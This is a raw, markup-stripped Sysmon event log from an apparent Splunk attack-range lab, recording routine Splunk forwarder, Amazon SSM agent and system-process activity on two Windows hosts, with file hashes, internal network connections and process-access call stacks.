23542300x8000000000000000214624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:54.114{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BFF738C83F9906F79584564F7DE8DA0,SHA256=5469732E7336A6E4DD1A4ED2CC1794F44AC50C59272D64E60827178D8DAE0459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:55.401{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95124FCC34B6791C4B607F83471A461B,SHA256=2110DB36C19BCAF6C25DBF6BF5C1102A1598C1870530FF08DF5F4F4524B8444F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:55.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6951615F38A91BD3B7919032B9D75BE0,SHA256=9E18034EBAC48375CE480546580D57F6BD164B7221BB13F6C1457A997708DC62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:56.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2712EF85F409CC020D2656E28F72F46,SHA256=E87CF77155887AEF17D37938D312AF98FFED3A7AA5049C01FB2FC98D5F011FF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:56.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44BFCF1DF2BDB76D44A5D01151A40DEB,SHA256=CF38D99B6FF9746BFEE46DE634022780387B2CF80468174BD44822EF95E552E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:57.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CCFA0563473642A5BCDBC569AA5C03B,SHA256=D4D196F63C1743AD91A3156F3D85DCB8D4F6EBA6AE375180AA06A1D2A9777246,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:55.554{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51200-false10.0.1.12-8000- 23542300x8000000000000000214627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:57.145{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970CE04729BE8273810C4FD2612A5C9A,SHA256=8F6D163854B299D49FFC002B239506B6B89CBC67C179D576B86E85FFDF3C90D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:58.638{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-122MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:58.449{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE197D2A7249FAE5C4A99E61A59A863,SHA256=A9A08DC5F8F00E9ADFF51E7B744F072E1DA967EADA3494861D5D09EB4B8026CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:58.161{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F554B2576548FACE0FF362CB0F606D8E,SHA256=BFE03C34CC626AAB4EBE01A6E8D1E764607E56802F591B8A9B5E3680F15CC89E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:55.611{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53261-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:59.653{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-123MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:59.480{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA0F37370669D2E64E41E1D3086E3B9,SHA256=61A38E4A35B0D7AC2B50C7ABEF4CDD6244FC97128B46A4F420F11EC6B1281C93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:59.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=364A1EB9FD2574B62FE6636EA9F61AB4,SHA256=15B3E699B9A272498210B457B0467D2B3D704A2F44243ED4816BA1AC474A6960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:00.513{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4C223C953FFF895282401214105A0E,SHA256=CFAC83826FC31F208F97B0277885CB220AD500E2DA332C39FF089B635FEDE039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:00.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB60DB174441958F6BBA871A1CC6C72F,SHA256=F0BC4D7DED9EE64AC1BF51595D39A7F2AD073720B09F1A2EF343055B4474725A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.528{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9028E12380F68E81D94ADC139972E9BC,SHA256=8C30A582B52193EC385ADD7F61B461BC4E5B0740E4F245FAB23CD732634FA6D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:01.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83F73A8575F62EA5F39D5A17AAD9D6E,SHA256=8C871603D10B0186571487030FAFD7076D37030154FEDB1F754541C94E796C7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE71963377E3DED5DA33A6A5691C4AEC,SHA256=D958698903535137BE53307B003FA2328E60A42258C3B09AD6786857252A6624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:02.208{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41419552F9E75189E191482BEF64F43B,SHA256=1B98B23D096E0F6D3E73E76FDE566E72077472CAB7FFB77DDA15AE22A648B8DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0EC6-6216-B404-000000003802}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0EC6-6216-B404-000000003802}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.497{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0EC6-6216-B404-000000003802}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.498{C8EA50B7-0EC6-6216-B404-000000003802}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:02.263{C8EA50B7-0EC5-6216-B304-000000003802}21885040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0EC5-6216-B304-000000003802}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0EC5-6216-B304-000000003802}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.997{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0EC5-6216-B304-000000003802}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 